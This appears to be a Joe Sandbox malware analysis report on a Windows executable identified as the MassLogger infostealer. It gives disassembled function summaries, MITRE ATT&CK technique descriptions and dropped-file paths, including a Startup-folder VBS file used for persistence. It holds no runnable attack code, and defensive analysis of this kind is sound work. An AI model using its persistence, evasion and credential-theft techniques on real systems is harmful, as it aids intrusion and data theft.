Function 00E64F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00E64F46
_wcscmp.LIBCMT ref: 00E64F58

Strings

#32770, xrefs: 00E64F52

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 392b7d8b4c53adfb01a7f5210f1811e32b64b053da01edfe9f9cb1291b676527
Instruction ID: bb78a945391400e6583d7bb4dfea464b096eab385a03c80bdc84ce36553541bf
Opcode Fuzzy Hash: 392b7d8b4c53adfb01a7f5210f1811e32b64b053da01edfe9f9cb1291b676527
Instruction Fuzzy Hash: D2E092326002282AE7209AAAAC49EA7F7ACEB55B60F101067FD04F2151D960AA458BE0

Function 00E3B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00E3B314: _memset.LIBCMT ref: 00E3B321

Part of subcall function 00E20940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E3B2F0,?,?,?,00E0100A), ref: 00E20945

IsDebuggerPresent.KERNEL32(?,?,?,00E0100A), ref: 00E3B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E0100A), ref: 00E3B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E3B2FE

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 964dc09943d34ccb87b9497b7c350490ebffbad99b6ceb63f480b6960c0c334c
Instruction ID: 1a9a6733760fc0859d51b44f2e2e09fae054039612465d2f4251614c17355f7a
Opcode Fuzzy Hash: 964dc09943d34ccb87b9497b7c350490ebffbad99b6ceb63f480b6960c0c334c
Instruction Fuzzy Hash: 1FE06D70200760CFD721AF69E5087467BE4AF44714F00996DE587F7251EBB4E488CBA1

Function 00E57C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E57C82

Part of subcall function 00E23358: _doexit.LIBCMT ref: 00E23362

Strings

Error allocating memory., xrefs: 00E57C7B
AutoIt, xrefs: 00E57C76

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: cc94ad0d7d049a92f88d87bd3b57ec13d9a5377bfc7b4dc0b7ffffbd5453dc7f
Instruction ID: 76e26aa7f6a58931729ed52a25be4928e1e77951a8addfcfe52b147e4fc155bd
Opcode Fuzzy Hash: cc94ad0d7d049a92f88d87bd3b57ec13d9a5377bfc7b4dc0b7ffffbd5453dc7f
Instruction Fuzzy Hash: 11D0C23238432836D10432A5BC06BCA6A884B04B13F102412FB48795D389D1858042E5

Function 00E41935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00E41775

Part of subcall function 00E7BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00E4195E,?), ref: 00E7BFFE
Part of subcall function 00E7BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E7C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00E4196D

Strings

WIN_XPe, xrefs: 00E41788

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 4b96c969ad262e5c5685c83b1dc49cb54ee24b3413e5ce58703efdb36d2c8324
Instruction ID: 4bf73077bd2a6df5f41a8ba30a9499efe9d6863a62ed6f96590a29c4db38affa
Opcode Fuzzy Hash: 4b96c969ad262e5c5685c83b1dc49cb54ee24b3413e5ce58703efdb36d2c8324
Instruction Fuzzy Hash: 02F0C970801109DFDF15DB91D988AECBBF8BB09305F6420D6E116B2091D7755F89DF64

Function 00E85998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E859AE
PostMessageW.USER32(00000000), ref: 00E859B5

Part of subcall function 00E65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E652BC

Strings

Shell_TrayWnd, xrefs: 00E859A7

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9d77228bac65dd620ef4dc88910f42bc382ecdc14e05c600a01bfec87dc7fe0c
Instruction ID: b6bac8f94c4a46c139084c3f2e9d08b55e95b8555507f1b1bfa80ac960cf5349
Opcode Fuzzy Hash: 9d77228bac65dd620ef4dc88910f42bc382ecdc14e05c600a01bfec87dc7fe0c
Instruction Fuzzy Hash: CED0C9323C1711BAE664BB71AC1BFD76665AB04B50F001835B249BA1E0D9E0A804C794

Function 00E85964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E8596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E85981

Part of subcall function 00E65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E652BC

Strings

Shell_TrayWnd, xrefs: 00E85967

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 4700bb77f868d02de341c24489ba6326e85c3d354a927d3598388753631d26bb
Instruction ID: 1464ba5dc431df3571a4d543bba6dcd15bee496b1fe714b1cbae2a1cf82ff991
Opcode Fuzzy Hash: 4700bb77f868d02de341c24489ba6326e85c3d354a927d3598388753631d26bb
Instruction Fuzzy Hash: EFD0C932384711BAE664BB71AC1BFE76A65AB00B50F001835B249BA1E0D9E0A804C794

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CvzLvta2bG.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe

C:\Users\user\AppData\Local\Temp\atule

C:\Users\user\AppData\Local\Temp\aut16C0.tmp

C:\Users\user\AppData\Local\Temp\aut1A3B.tmp

C:\Users\user\AppData\Local\Temp\aut486F.tmp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
CvzLvta2bG.exe

Function 00E03B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 00E049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00E04E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00E69155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00E0301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00E03041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 00E0708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00E03633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00E03A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00E03766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre